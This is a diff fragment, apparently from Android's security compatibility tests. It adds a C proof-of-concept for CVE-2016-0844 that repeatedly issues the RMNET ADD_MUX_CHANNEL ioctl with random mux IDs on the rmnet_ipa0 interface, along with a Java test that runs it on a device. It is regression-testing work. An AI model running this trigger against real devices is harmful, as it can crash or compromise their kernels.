+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <net/if_arp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <time.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+#define WAN_IOC_MAGIC 0x69
+#define WAN_IOCTL_ADD_FLT_RULE 0
+#define WAN_IOCTL_ADD_FLT_INDEX 2
+#define WAN_IOC_ADD_FLT_RULE                                                   \
+  _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_RULE,                                 \
+        struct ipa_install_fltr_rule_req_msg_v01 *)
+
+#define WAN_IOC_ADD_FLT_RULE_INDEX                                             \
+  _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_INDEX,                                \
+        struct ipa_fltr_installed_notif_req_msg_v01 *)
+
+int trigger(int sfd, char *ifname) {
+  int ret;
+  struct ifreq ifr;
+  unsigned cmd = RMNET_IOCTL_EXTENDED;
+  strlcpy(ifr.ifr_name, ifname, IFNAMSIZ);
+  struct rmnet_ioctl_extended_s extendata;
+  int i;
+  ifr.ifr_ifru.ifru_data = &extendata;
+  extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL;
+  for (i = 0; i < 3; i++) {
+    extendata.u.rmnet_mux_val.mux_id = rand();
+    printf("[-] call ioctl %d\n", i);
+    if (ioctl(sfd, cmd, &ifr) < 0) {
+      printf("%s, %s\n", __func__, strerror(errno));
+      ret = -1;
+    }
+  }
+
+  return ret;
+}
+
+int main() {
+  int sockfd;
+  char *ifname = "rmnet_ipa0";
+
+  srand(time(NULL));
+
+  if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
+    printf("socket = %d, %s\n", sockfd, strerror(errno));
+    exit(1);
+  }
+
+  trigger(sockfd, ifname);
+  return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_04.java b/hostsidetests/security/src/android/security/cts/Poc16_04.java
index 5d033751c0a..d3da9357393 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_04.java
@@ -30,4 +30,12 @@ public class Poc16_04 extends SecurityTestCase {
         String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
         assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat);
     }
+
+    /**
+    *  b/26324307
+    */
+    @SecurityTest
+    public void testPocCVE_2016_0844() throws Exception {
+        AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
+    }
 }